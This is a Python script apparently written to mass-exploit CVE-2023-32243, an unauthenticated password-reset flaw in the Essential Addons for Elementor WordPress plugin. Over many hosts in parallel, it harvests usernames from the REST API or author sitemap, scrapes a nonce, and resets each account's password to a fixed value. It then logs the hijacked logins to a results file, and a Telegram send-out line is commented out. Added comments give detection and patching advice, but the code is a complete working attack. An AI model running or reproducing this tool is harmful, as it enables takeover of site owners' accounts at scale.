CVE-2023-32243.py
import requests,time,re,random,os,sys,json
from multiprocessing.dummy import Pool as ThreadPool
from colorama import Fore,Style, init
# Console setup: colorama is initialised with autoreset=True, and the
# one-letter names below are colour prefixes concatenated into status lines.
init(autoreset=True)
r = Fore.RED + Style.BRIGHT
g = Fore.GREEN + Style.BRIGHT
c = Fore.CYAN + Style.BRIGHT
y = Fore.YELLOW + Style.BRIGHT
o = Fore.RESET + Style.RESET_ALL
# Static header set passed to every requests.get/requests.post call in this
# file. The values never vary between hosts or between GET and POST, so the
# exact combination (this User-Agent string, a form Content-Type on GET
# requests, Sec-Fetch-Site: same-origin on every request) can be matched in
# web-server or WAF logs when hunting for traffic from this script.
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
# 'Accept-Encoding': 'gzip, deflate, br',
'Content-Type': 'application/x-www-form-urlencoded',
'Connection': 'keep-alive',
# 'Cookie': 'wordpress_test_cookie=WP%20Cookie%20check; slimstat_tracking_code=3386.b77ee445be809a12d617d72914d52783',
'Upgrade-Insecure-Requests': '1',
'Sec-Fetch-Dest': 'document',
'Sec-Fetch-Mode': 'navigate',
'Sec-Fetch-Site': 'same-origin',
'Sec-Fetch-User': '?1',
}
# ambil_User(url): username discovery for one host.
# `url` is a bare host string; 'http://' is prepended here, so every request
# goes out over plain HTTP.
# NOTE(review): indentation was lost in this listing, so the nesting described
# below is inferred from the if/else order -- confirm against the original file.
# Defender view: both lookups below read login names that the site serves to
# unauthenticated clients. Restricting anonymous access to
# /wp-json/wp/v2/users and to author sitemaps removes the inputs this function
# relies on, and the two GETs arriving back to back from one client are a
# usable log signal.
def ambil_User(url):
try:
# First source: the WordPress REST users endpoint; the first "slug" value in
# the response is used as the account name.
ngambil = requests.get('http://'+url+'/wp-json/wp/v2/users',headers=headers,timeout=10)
if '"slug":"' in ngambil.content:
hasil = re.findall('"slug":"(.*?)"', ngambil.text)
user = hasil[0]
RANDOME(url,user)
else:
print(y+'http://'+url+ ' ' +r+ 'FAILED GET USERNAME'+o)
# Presumably the fallback branch: the author sitemap, from which the first
# author/<name>/ path segment is taken.
ngambile = requests.get('http://'+url+'/author-sitemap.xml',headers=headers,timeout=10)
if 'Sitemap' in ngambile.content:
jancok = re.findall('author/(.*?)/',ngambile.text)
user = jancok[0]
RANDOME(url,user)
else:
print(y+'http://'+url+ ' ' +r+ 'FAILED GET USERNAME'+o)
# Bare except: every exception (timeouts, connection errors, an empty match
# list) is discarded without output.
except:
pass
# RANDOME(url, user): sends the password-reset request for `user` on one host.
# NOTE(review): indentation was lost in this listing; which `if` the `else`
# near the end belongs to cannot be determined from here.
# Defender view:
# - The nonce is scraped from the home page as served to an anonymous visitor,
#   and the payload contains no password-reset key or token tied to the
#   account, so nothing in the request shows that the sender controls the
#   account being changed.
# - The eael-* field names are those of the Essential Addons for Elementor
#   plugin; the mitigation is to update it to a release that fixes
#   CVE-2023-32243.
# - Detection: an unauthenticated POST to /wp-admin/admin-ajax.php with
#   action=login_or_register_user and eael-resetpassword-submit=true. After a
#   match, review the named account for an unexpected password change and for
#   subsequent /wp-login.php sign-ins.
def RANDOME(url,user):
try:
# The home page is fetched only to obtain the nonce embedded next to the
# admin-ajax.php URL in the page markup.
response = requests.get('http://'+url, headers=headers,timeout=10).content
if 'ajaxurl' in response:
nonce = re.findall('admin-ajax.php","nonce":"(.*?)"',response)[0]
# page_id, widget_id and both password fields are fixed literals; only the
# nonce and the username differ between hosts.
payload = {
"action": "login_or_register_user",
"eael-resetpassword-submit": "true",
"page_id": "124",
"widget_id": "224",
"eael-resetpassword-nonce": nonce,
"eael-pass1": 'Shin_Code403',
"eael-pass2": 'Shin_Code403',
"rp_login": user
}
response2 = requests.post('http://'+url+'/wp-admin/admin-ajax.php', headers=headers, data=payload,timeout=10)
# The reset is treated as successful when the response body contains
# success":true; the login URL, username and password are then printed and
# appended to resulst.txt as one '|'-separated line.
if 'success":true' in response2.text:
print(y+'GAS' + ' ==> ' +g+ 'http://'+url+'/wp-login.php' +'|'+ user + '|' + 'Shin_Code403'+o)
open('resulst.txt','a').write('http://'+url+'/wp-login.php' +'|'+ user + '|' + 'Shin_Code403'+'\n')
#send_to_telegram('http://'+url+'/wp-login.php' +'|'+ user + '|' + 'Shin_Code403'+'\n')
else:
print('http://'+url+' '+r+ 'BAD'+o)
# Bare except: every exception is discarded without output.
except:
#print(e)
pass
# Script entry point. The print statement and raw_input() are Python 2 syntax.
# It clears the terminal, prints a banner, reads a file of hosts (one per line,
# with any http:// or https:// prefix removed) and runs ambil_User over them on
# a pool of 20 threads (multiprocessing.dummy.Pool is thread-based).
# Defender view: each listed host receives at most four requests (two username
# lookups, one home-page fetch, one POST), each with a 10-second timeout, and
# many hosts are processed in parallel -- the traffic shape of opportunistic
# bulk scanning rather than of a single targeted site.
if __name__ == '__main__':
os.system('cls' if os.name == 'nt' else 'clear')
print "{} CVE-2023-32243 | {}Shin Code\n".format(y,c)
url = open(raw_input('List:~# '),'r').read().replace('http://','').replace('https://','').splitlines()
pool = ThreadPool(int(20))
pool.map(ambil_User, url)
pool.close()
pool.join()